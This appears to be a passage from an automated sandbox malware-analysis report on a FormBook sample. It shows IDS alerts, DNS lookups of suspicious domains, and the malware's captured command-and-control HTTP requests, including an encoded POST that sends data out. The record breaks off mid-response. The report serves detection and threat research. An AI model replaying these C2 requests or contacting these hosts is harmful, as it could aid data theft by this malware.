                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50254 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50265 -> 157.112.187.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50246 -> 134.122.135.54:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50242 -> 209.74.77.230:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50248 -> 134.122.135.54:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50276 -> 3.33.130.190:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.lenzor.xyz
                Source: DNS query: www.031233720.xyz
                Source: DNS query: www.dualbitcoin.xyz
                Source: DNS query: www.ethereumkeeper.xyz
                Source: DNS query: www.moonavatar.xyz
                Source: DNS query: www.blogkart4u.xyz
                Source: DNS query: www.splogi.xyz
                Source: DNS query: www.splogi.xyz
                Source: Joe Sandbox ViewIP Address: 8.222.228.107 8.222.228.107
                Source: Joe Sandbox ViewIP Address: 157.112.187.77 157.112.187.77
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /0pv3/?eL7h=I6G8DBRKF3PN9Cy5HjggG2ycZCNyM0JG3kSPGuvbR5esC8dJu2EfwhpJJLd7FYxSNzCiq9OPGq3cAsVzLwaIAq+rDUC7Ws6F1E/QRL3HoNlolI9QSKQE0mSGSrcLWdFvRw==&wp=Oz9Xwzahdr HTTP/1.1Host: www.crosspatches.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficHTTP traffic detected: GET /ynw5/?eL7h=ZF/ThatktxT4IEpwfKsUOyQVHh5nHqomFNyY5ir4FklXSfOpwm6EfqJ4jyoelDA7A+pvc8dOI9DtdfL88IP+1kOCv+QPJBPSYWlpE+7rJT4XimcIjMNVjm2BzIrdTYhFEQ==&wp=Oz9Xwzahdr HTTP/1.1Host: www.quo1ybjmkhdqljoz.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficHTTP traffic detected: GET /pknc/?wp=Oz9Xwzahdr&eL7h=TsWT+PVJyweInpctzthQVdxTMr7Q3Mb2cuEH07dFoI07yBLnimF2DBYyoUH276N8oHesXX9azD5G5u0ynw8eGFj9tum9xXwIQ0i8jcSREbVxD3yrlD8BVP9rS1PvZDB20g== HTTP/1.1Host: www.lenzor.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficHTTP traffic detected: GET /hxn2/?eL7h=ZV/imptMlgE5kVt692kkoOOnpYQNqGQCFmm/TGgbqnHG1mgu4lPPJ2KHb3Eys5m88oXnT1AcDhAihVQlrO8FUlJM8pp5ZWnyQzjiEF0o+8f3DTsNGzDCqAFXqps7Otorhw==&wp=Oz9Xwzahdr HTTP/1.1Host: www.warc.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficHTTP traffic detected: GET /qxo2/?eL7h=o8DmqPI+VqVvnj/lu1ZpZtXdZr7bSrN2dVm8WOSQKn+kpW+rBJORjMlPia6OnGwbOFqdqYTBcx/hOJb3c+NaqPX0LJkVfisaYNtVIumZsa/w93UM+1/1xwWXjFPUQFIIoA==&wp=Oz9Xwzahdr HTTP/1.1Host: www.dualbitcoin.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficHTTP traffic detected: GET /shtf/?eL7h=FhU37QPUjXoDR/mkORBYEbzjzv1Jdaom3Ft3Wddglnt/yj+EbctenxscC0kIxMOxkZk08U8HpLn+XILh76EKfBcWBx3ZdyGeG6imEjJY2D+6g27gdHVaycndfCLvnlFPmA==&wp=Oz9Xwzahdr HTTP/1.1Host: www.lifce.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficHTTP traffic detected: GET /qkhv/?eL7h=i51Ixu4M5LOvjs5atst6QhQmAxFvlGpFEg8Yva/DYuN1L4sxQPD0gcYXROip4eIGKLRWO2x5MCzKIlk6eYaz3FYy7ZtcWTJr5uThofgj61z5iUNO0ndKyizlBAbSXj3dvw==&wp=Oz9Xwzahdr HTTP/1.1Host: www.2y0uoqwoohvdf5vd.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficHTTP traffic detected: GET /gu37/?wp=Oz9Xwzahdr&eL7h=iOl0XSH5CDMOf+V9HZ+UKaCE6FMs6uPW7cxb7UU6mqRal+VgoP4cf7GVxAN/lcjotRpWXcIGUQ8s/QpRPpBC0s0rNGXrLX7QDONBrJAsmoe5Xjn3FbB7jvONWBxWv0+Npg== HTTP/1.1Host: www.ethereumkeeper.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficHTTP traffic detected: GET /36cg/?wp=Oz9Xwzahdr&eL7h=c6lcAlso4cwdWdj8OmW47AtI274xiSR94bq7w+xrmdROEAiOB56qTuKvZNoCgSLBfC/6u7yUdjQUAHkJ36WqigWvF+W/duDuE7nAcq/mnuhXg7Y1Cc7r91JMMuzgajzb2w== HTTP/1.1Host: www.blogkart4u.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficHTTP traffic detected: GET /4w1v/?eL7h=XpAG9fe2pLhJKmhZ85et2/QP5MtwFiP0J2u6NTgZVwSRoaiRiOX3KjlWgf7AqOqvMoNp5Q5VLCDsww+9yNor5ytr2WIHcAqjmNJrHjaZFAGyn8W5/AYut6n/+WvKvTb4gg==&wp=Oz9Xwzahdr HTTP/1.1Host: www.xiongding.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficHTTP traffic detected: GET /hlq7/?eL7h=dKN4O6z/N4DapGrcMOyrOAnbRVSrFobPG5RCVPQvSrMdLQWk1/Pc73VtQKyrUXqHVsljfksdfGpNujtuX/ZsoQbQw1ZjcAXf/RBxpP3vDPBqvfaPTUP+zIuVIrlIxG7UVQ==&wp=Oz9Xwzahdr HTTP/1.1Host: www.savposalore.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficHTTP traffic detected: GET /ti21/?eL7h=WGxoXqct8zJEPhtv7hvcADdTxPrqYVBaAgo9WLM116GuHzjz/IohiFqyzVfMSqM9DJaG8JlLLxRiginV+Pkm5SzO6x71SPK57QSrEA4wlUVlvQvqLEJhjjQQTB+w8Fkx0A==&wp=Oz9Xwzahdr HTTP/1.1Host: www.splogi.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficHTTP traffic detected: GET /pzq1/?eL7h=oDRqyMa6fuBuz7WmYIBwRJUpV6l9q4FTd5aLt2B5ybsFCSl98v1LZFy0dWfSbHe14Kep4ozyTwqi5TiZwq01U//3mNoy1jqeIyDC7DcZZUyW/Gu+bds5KjNjbZauKnuP5A==&wp=Oz9Xwzahdr HTTP/1.1Host: www.knowesis.appAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficHTTP traffic detected: GET /j64s/?eL7h=EoY4h0UyAqkEWvzM9EA/7w4uqd0YPBtkD+z/1eOQyjkeiCosMlbYcdVAn/lmFNVY6HN81TLliXNwIu9yWC9xuBVttTwnAOclpnCKNczkx83UzwDUlxWGsR49hCJNpTaAAw==&wp=Oz9Xwzahdr HTTP/1.1Host: www.jingdongpt.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficDNS traffic detected: DNS query: www.crosspatches.info
                Source: global trafficDNS traffic detected: DNS query: www.quo1ybjmkhdqljoz.top
                Source: global trafficDNS traffic detected: DNS query: www.lenzor.xyz
                Source: global trafficDNS traffic detected: DNS query: www.warc.tech
                Source: global trafficDNS traffic detected: DNS query: www.031233720.xyz
                Source: global trafficDNS traffic detected: DNS query: www.dualbitcoin.xyz
                Source: global trafficDNS traffic detected: DNS query: www.lifce.life
                Source: global trafficDNS traffic detected: DNS query: www.2y0uoqwoohvdf5vd.top
                Source: global trafficDNS traffic detected: DNS query: www.ethereumkeeper.xyz
                Source: global trafficDNS traffic detected: DNS query: www.moonavatar.xyz
                Source: global trafficDNS traffic detected: DNS query: www.blogkart4u.xyz
                Source: global trafficDNS traffic detected: DNS query: www.xiongding.tech
                Source: global trafficDNS traffic detected: DNS query: www.savposalore.shop
                Source: global trafficDNS traffic detected: DNS query: www.splogi.xyz
                Source: global trafficDNS traffic detected: DNS query: www.knowesis.app
                Source: global trafficDNS traffic detected: DNS query: www.jingdongpt.shop
                Source: unknownHTTP traffic detected: POST /ynw5/ HTTP/1.1Host: www.quo1ybjmkhdqljoz.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Origin: http://www.quo1ybjmkhdqljoz.topReferer: http://www.quo1ybjmkhdqljoz.top/ynw5/Connection: closeCache-Control: no-cacheContent-Length: 205Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1Data Raw: 65 4c 37 68 3d 55 48 58 7a 69 74 35 69 68 6d 6e 75 56 45 64 6d 57 71 6f 47 48 51 30 58 4d 6a 70 55 53 66 4d 72 48 50 71 38 77 43 7a 4e 49 56 78 43 52 74 66 75 36 55 33 36 51 76 59 65 6e 54 74 67 73 68 6f 4e 49 63 70 64 59 38 5a 56 51 4e 79 52 66 76 4c 2b 33 38 65 2f 6a 30 6d 39 70 74 46 78 59 52 62 57 66 6d 6f 36 44 50 61 4a 4c 48 6b 61 6b 46 77 49 6f 2f 78 50 75 57 47 7a 34 6f 33 6b 48 73 6f 64 65 6f 67 65 64 66 56 35 48 69 63 45 62 63 42 79 32 61 79 74 33 53 50 4a 36 49 7a 6d 57 58 4b 65 47 38 45 41 2b 6d 63 37 4a 59 36 38 4d 6e 64 71 63 4f 31 6f 30 74 33 57 34 36 36 53 34 56 5a 46 57 45 56 41 54 44 67 3d Data Ascii: eL7h=UHXzit5ihmnuVEdmWqoGHQ0XMjpUSfMrHPq8wCzNIVxCRtfu6U36QvYenTtgshoNIcpdY8ZVQNyRfvL+38e/j0m9ptFxYRbWfmo6DPaJLHkakFwIo/xPuWGz4o3kHsodeogedfV5HicEbcBy2ayt3SPJ6IzmWXKeG8EA+mc7JY68MndqcO1o0t3W466S4VZFWEVATDg=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 01:49:46 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 01:49:48 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 01:49:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 01:49:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Tue, 11 Mar 2025 01:50:00 GMTServer: nginxConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Tue, 11 Mar 2025 01:50:02 GMTServer: nginxConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Tue, 11 Mar 2025 01:50:05 GMTServer: nginxConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Tue, 11 Mar 2025 01:50:08 GMTServer: nginxConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 01:51:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 28 Nov 2024 18:44:51 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TZV9Rfh5YqPqSU%2F4IXMm69rvLehRikzc4zR96Feu7a0en2CfwlxkbBKPPhyKjEWh96KHiryImuFHexYifKIL5jCad0oj778kpW%2BK60jxnjtkYl2Dw7TU9Zn8XdHkXC2XYqPLucYqKw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e767910be8b4c6-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2072&min_rtt=2072&rtt_var=1036&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=694&delivery_rate=0&cwnd=132&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 66 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 51 6f db 36 10 7e cf af b8 a9 d8 b0 01 95 68 59 69 13 4b b2 80 cc 4e b0 02 5d 17 ac 